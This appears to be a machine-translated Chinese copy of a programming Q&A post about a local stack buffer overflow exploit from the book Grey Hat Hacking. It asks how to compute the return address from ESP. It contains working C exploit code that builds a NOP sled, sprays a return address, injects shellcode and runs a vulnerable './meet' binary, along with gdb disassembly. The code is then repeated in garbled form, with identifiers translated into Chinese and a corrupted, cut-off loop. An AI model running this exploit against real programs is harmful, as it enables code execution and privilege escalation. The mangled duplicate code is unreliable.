C 用ESP计算溢出返回地址
我遵循Grey Hat Hacking中的缓冲区溢出示例,已经成功地执行了外壳代码,并使用下面的漏洞攻击程序打开了一个外壳,但是由于初始ESP值的差异,我无法在不首先猜测缓冲区偏移量的情况下运行它 这是针对任何本地易受攻击的缓冲区的攻击程序(删除了一些行):C 用ESP计算溢出返回地址,c,gdb,buffer-overflow,C,Gdb,Buffer Overflow,我遵循Grey Hat Hacking中的缓冲区溢出示例,已经成功地执行了外壳代码,并使用下面的漏洞攻击程序打开了一个外壳,但是由于初始ESP值的差异,我无法在不首先猜测缓冲区偏移量的情况下运行它 这是针对任何本地易受攻击的缓冲区的攻击程序(删除了一些行): unsigned long get_sp(void){ __asm__("movl %esp, %eax"); } int main(int argc, char *argv[1]) { int i, offset = 0
unsigned long get_sp(void){
__asm__("movl %esp, %eax");
}
int main(int argc, char *argv[1]) {
int i, offset = 0;
unsigned int esp, ret, *addr_ptr;
char *buffer, *ptr;
int size = 500;
esp = get_sp();
if(argc > 1) size = atoi(argv[1]);
if(argc > 2) offset = atoi(argv[2]);
if(argc > 3) esp = strtoul(argv[3],NULL,0);
ret = esp - offset;
buffer = (char *)malloc(size);
ptr = buffer;
addr_ptr = (unsigned int *) ptr;
for(i=0; i < size; i+=4){
*(addr_ptr++) = ret;
}
for(i=0; i < size/2; i++){
buffer[i] = '\x90';
}
ptr = buffer + size/2;
for(i=0; i < strlen(shellcode); i++){
*(ptr++) = shellcode[i];
}
buffer[size-1]=0;
execl("./meet", "meet", "Mr.",buffer,0);
free(buffer);
return 0;
}
unsigned long get_sp(void){
__asm_uuuuuuuuuuuuuuuuu(“移动百分比esp,%eax”);
}
int main(int argc,char*argv[1]){
int i,偏移量=0;
无符号整数esp、ret、*addr_ptr;
字符*缓冲区,*ptr;
int size=500;
esp=获取_sp();
如果(argc>1)size=atoi(argv[1]);
如果(argc>2)偏移量=atoi(argv[2]);
如果(argc>3)esp=strtoul(argv[3],NULL,0);
ret=esp-偏移量;
缓冲区=(字符*)malloc(大小);
ptr=缓冲区;
addr_ptr=(无符号整数*)ptr;
对于(i=0;i1 int main(int argc,char *argv[]) {
2 unsigned int sp = get_sp();
3 int size = atoi(argv[1]);
(gdb) disas main
Dump of assembler code for function main:
0x08048582 <+0>: push %ebp
0x08048583 <+1>: mov %esp,%ebp
0x08048585 <+3>: push %ebx
0x08048586 <+4>: sub $0x1c,%esp
=> 0x08048589 <+7>: call 0x804857b <get_sp>
(gdb)disas main
主功能的汇编程序代码转储:
0x08048582:推送%ebp
0x08048583:mov%esp,%ebp
0x08048585:推送%ebx
0x08048586:子$0x1c,%esp
=>0x08048589:调用0x804857b